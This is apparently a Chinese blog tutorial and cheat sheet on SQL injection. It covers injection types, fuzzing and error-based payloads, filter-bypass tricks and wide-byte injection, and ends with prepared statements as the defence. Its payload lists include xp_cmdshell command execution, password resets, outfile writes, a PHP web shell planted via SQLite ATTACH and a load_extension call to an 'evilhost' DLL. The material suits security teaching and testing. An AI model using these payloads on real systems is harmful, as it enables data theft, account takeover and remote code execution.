漏洞攻防系列-SQL注入

SQL 注入是一种代码注入技术，用于攻击数据驱动的应用程序。 在应用程序中，如果没有做恰当的过滤，则可能使得恶意的 SQL 语句被插入输入字段中执行

0×00 前言

什么是 SQL 注入

SQL 注入是一种代码注入技术，用于攻击数据驱动的应用程序。 在应用程序中，如果没有做恰当的过滤，则可能使得恶意的 SQL 语句被插入输入字段中执行（例如将数据库内容转储给攻击者）。

0×01 类型

1.1 按技巧分类

根据使用的技巧，SQL 注入类型可分为

• 盲注
  • 布尔盲注：只能从应用返回中推断语句执行后的布尔值
  • 时间盲注：应用没有明确的回显，只能使用特定的时间函数来判断
• 报错注入：应用会显示全部或者部分的报错信息
• 堆叠注入：有的应用可以加入  ;  后一次执行多条语句
• 其他

1.2 按数据获取方式分类

根据获取数据的方式分为 3 类

• inband
  • 利用 Web 应用来直接获取数据
  • 如报错注入
  • 都是通过站点的响应或者错误反馈来提取数据
• inference
  • 通过 Web 的一些反映来推断数据
  • 如布尔盲注和堆叠注入
  • 也就是我们通俗的盲注，
  • 通过 web 应用的其他改变来推断数据
• out of band(OOB)
  • 通过其他传输方式来获得数据，比如 DNS 解析协议和电子邮件

0×02 注入检测

2.1 常见的注入点

• GET/POST/PUT/DELETE 参数
• X-Forwarded-For
• 文件名

2.2 Fuzz 注入点

• ‘ / “
• 1/1
• 1/0
• and 1=1
• “ and “1”=”1
• and 1=2
• or 1=1
• or 1=
• ‘ and ‘1’=’1
• + - ^ * % /
• << >> || | & &&
• ~
• !
• @
• 反引号执行

2.3 测试用常量

• @@version
• @@servername
• @@language
• @@spid

2.4 测试列数

例如 http://www.foo.com/index.asp?id=12+union+select+null,null-- ，不断增加  null  至不返回

2.5 报错注入

• select 1/0
• select 1 from (select count(_),concat(version(),floor(rand(0)_2))x from  information_schema.tables group by x)a
• extractvalue(1, concat(0x5c,(select user())))
• updatexml(0x3a,concat(1,(select user())),1)
• exp((SELECT * from(select user())a))
• ST*LatFromGeoHash((select * from(select _ from(select user())a)b))
• GTID_SUBSET(version(), 1)

基于 geometric 的报错注入

• GeometryCollection((select _ from (select _ from(select user())a)b))
• polygon((select _ from(select _ from(select user())a)b))
• multipoint((select _ from(select _ from(select user())a)b))
• multilinestring((select _ from(select _ from(select user())a)b))
• LINESTRING((select _ from(select _ from(select user())a)b))
• multipolygon((select _ from(select _ from(select user())a)b))

其中需要注意的是，基于 exp 函数的报错注入在 MySQL 5.5.49 后的版本已经不再生效，具体可以参考这个  commit 95825f 。

而以上列表中基于 geometric 的报错注入在这个  commit 5caea4  中被修复，在 5.5.x 较后的版本中同样不再生效。

2.6 堆叠注入

• ;select 1

2.7 注释符

• #
• –+
• /xxx/
• /!xxx/
• /!50000xxx/

2.8 判断过滤规则

• 是否有 trunc
• 是否过滤某个字符
• 是否过滤关键字
• slash 和编码

2.9 获取信息

• 判断数据库类型
  _ and exists (select _ from msysobjects ) > 0 access 数据库
  _ and exists (select _ from sysobjects ) > 0 SQLServer 数据库
• 判断数据库表
  • and exsits (select * from admin)
• 版本、主机名、用户名、库名
• 表和字段
  • 确定字段数
    • Order By
    • Select Into
  • 表名、列名

2.10 测试权限

• 文件操作
  • 读敏感文件
  • 写 shell
• 带外通道
  • 网络请求

0×03 权限提升

3.1 UDF 提权

UDF（User Defined Function，用户自定义函数）是 MySQL 提供的一个功能，可以通过编写 DLL 扩展为 MySQL 添加新函数，扩充其功能。当获得 MySQL 权限之后，即可通过这种方式上传自定义的扩展文件，从 MySQL 中执行系统命令。

0×04 数据库检测

4.1 MySQL

• sleep sleep(1)
• benchmark BENCHMARK(5000000, MD5('test'))
• 字符串连接
  • SELECT 'a' 'b'
  • SELECT CONCAT('some','string')
• version
  • SELECT @@version
  • SELECT version()
• 识别用函数
  • connection_id()
  • last_insert_id()
  • row_count()

4.2 Oracle

• 字符串连接
  • 'a'||'oracle' --
  • SELECT CONCAT('some','string')
• version
  • SELECT banner FROM v$version
  • SELECT banner FROM v$version WHERE rownum=1

4.3 SQLServer

• WAITFOR WAITFOR DELAY '00:00:10';
• SERVERNAME SELECT @@SERVERNAME
• version SELECT @@version
• 字符串连接
  • SELECT 'some'+'string'
• 常量
  • @@pack_received
  • @@rowcount

4.4 PostgreSQL

• sleep pg_sleep(1)

0×05 绕过技巧

5.1 编码绕过

• 大小写
• url 编码
• html 编码
• 十六进制编码
• unicode 编码

5.2 注释

• //  --  --  +  --  -  #  /**/  ;%00
• 内联注释用的更多，它有一个特性/!**/ 只有 MySQL 能识别
• e.g. index.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3

5.3 只过滤了一次时

• union => ununionion

5.4 相同功能替换

• 函数替换
  • substring / mid / sub
  • ascii / hex / bin
  • benchmark / sleep
• 变量替换
  • user() / @@user
• 符号和关键字
  • and / &
  • or / |

5.5 HTTP 参数

• HTTP 参数污染
  • id=1&id=2&id=3 根据容器不同会有不同的结果
• HTTP 分割注入

5.6 缓冲区溢出

• 一些 C 语言的 WAF 处理的字符串长度有限，超出某个长度后的 payload 可能不会被处理

5.7 二次注入

• 二次注入有长度限制时，通过多句执行的方法改掉数据库该字段的长度绕过

0×06 SQL 注入小技巧

6.1 宽字节注入

一般程序员用 gbk 编码做开发的时候，会用 set names 'gbk' 来设定，这句话等同于

set
character_set_connection = 'gbk',
character_set_result = 'gbk',
character_set_client = 'gbk';

漏洞发生的原因是执行了 set character_set_client = 'gbk'; 之后，mysql 就会认为客户端传过来的数据是 gbk 编码的，从而使用 gbk 去解码，而 mysql_real_escape 是在解码前执行的。但是直接用 set names 'gbk' 的话 real_escape 是不知道设置的数据的编码的，就会加%5c 。此时 server 拿到数据解码 就认为提交的字符+%5c 是 gbk 的一个字符，这样就产生漏洞了。

解决的办法有三种，第一种是把 client 的 charset 设置为 binary，就不会做一次解码的操作。第二种是是 mysql_set_charset('gbk') ，这里就会把编码的信息保存在和数据库的连接里面，就不会出现这个问题了。 第三种就是用 pdo。

还有一些其他的编码技巧，比如 latin 会弃掉无效的 unicode，那么 admin%32 在代码里面不等于 admin，在数据库比较会等于 admin。

0×07 CheatSheet

7.1 SQL Server Payload

• Version
  • SELECT @@version
• Comment
  • SELECT 1 -- comment
  • SELECT /*comment*/1
• Space
  • 0x01 - 0x20
• Current User
  • SELECT user_name()
  • SELECT system_user
  • SELECT user
  • SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
    **_ List User_
  • SELECT name FROM master..syslogins
• Current Database
  • SELECT DB_NAME()
• List Database
  • SELECT name FROM master..sysdatabases
• Command
  • EXEC xp_cmdshell 'net user'
• Ascii
  • SELECT char(0x41)
  • SELECT ascii('A')
  • SELECT char(65)+char(66) => return AB
• Delay
  • WAITFOR DELAY '0:0:3'pause for 3 seconds
• Change Password
  • ALTER LOGIN [sa] WITH PASSWORD=N'NewPassword'
• Trick
  • id=1 union:select password from:user

7.2 MySQL Payload

• Version
  • SELECT @@version
• Comment
  • SELECT 1 -- comment
  • SELECT 1 # comment
  • SELECT /*comment*/1
• Space
  • 0x9  0xa-0xd  0x20  0xa0
• Current User
  • SELECT user()
  • SELECT system_user()
• List User
  • SELECT user FROM mysql.user
• Current Database
  • SELECT database()
• List Database
  • SELECT schema_name FROM information_schema.schemata
• List Tables
  • SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
• List Columns
  • SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
• If *SELECT if(1=1,'foo','bar'); return ‘foo’
• Ascii
  • SELECT char(0x41)
  • SELECT ascii('A')
  • SELECT 0x414243 => return ABC
• Delay
  • sleep(1)
  • SELECT BENCHMARK(1000000,MD5('A'))
• Read File
  • select @@datadir
  • select load_file('databasename/tablename.MYD')
• Blind
  • ascii(substring(str,pos,length)) & 32 = 1
• Error Based
  • select count(*),(floor(rand(0)*2))x from information_schema.tables group by x;
• Write File
  • union select 1,1,1 into outfile '/tmp/demo.txt'
  • union select 1,1,1 into dumpfile '/tmp/demo.txt'
  • dumpfile 和 outfile 不同在于，outfile 会在行末端写入新行，会转义换行符，如果写入二进制文件，很可能被这种特性破坏
• Change Password
  • mysql -uroot -e "use mysql;UPDATE user SET password=PASSWORD('newpassword') WHERE user='root';FLUSH PRIVILEGES;"

7.3 PostgresSQL Payload

• Version
  • SELECT version()
• Comment
  • SELECT 1 -- comment
  • SELECT /*comment*/1
• Current User
  • SELECT user
  • SELECT current_user
  • SELECT session_user
  • SELECT getpgusername()
• List User
  • SELECT usename FROM pg_user
• Current Database
  • SELECT current_database()
• List Database
  • SELECT datname FROM pg_database
• Ascii
  • SELECT char(0x41)
  • SELECT ascii('A')
• Delay
  • pg_sleep(1)

7.4 Oracle Payload

• dump
  • SELECT * FROM ALL_TABLES
• Comment
  • --
  • /**/
• Space
  • 0x00  0x09  0xa-0xd  0x20

7.5 SQLite3 Payload

• Comment
  • --
  • /**/
• Version
  • select sqlite_version();
• Command Execution

ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--

**_ Load_extension_

• UNION SELECT 1,load_extension('\\evilhost\evil.dll','E');--

0×08 预编译

8.1 简介

SQL 注入是因为解释器将传入的数据当成命令执行而导致的，预编译是用于解决这个问题的一种方法。和普通的执行流程不同，预编译将一次查询通过两次交互完成，第一次交互发送查询语句的模板，由后端的 SQL 引擎进行解析为 AST 或 Opcode，第二次交互发送数据，代入 AST 或 Opcode 中执行。因为此时语法解析已经完成，所以不会再出现混淆数据和代码的过程。

8.2 模拟预编译

为了防止低版本数据库不支持预编译的情况，模拟预编译会在客户端内部模拟参数绑定的过程，进行自定义的转义。

8.3 绕过

预编译使用错误
预编译只是使用占位符替代的字段值的部分，如果第一次交互传入的命令使用了字符串拼接，使得命令是攻击者可控的，那么预编译不会生效。

部分参数不可预编译
在有的情况下，数据库处理引擎会检查数据表和数据列是否存在，因此数据表名和列名不能被占位符所替代。这种情况下如果表名和列名可控，则可能引入漏洞。

预编译实现错误
部分语言引擎在实现上存在一定问题，可能会存在绕过漏洞。

赏

谢谢你请我吃糖果

支付宝

微信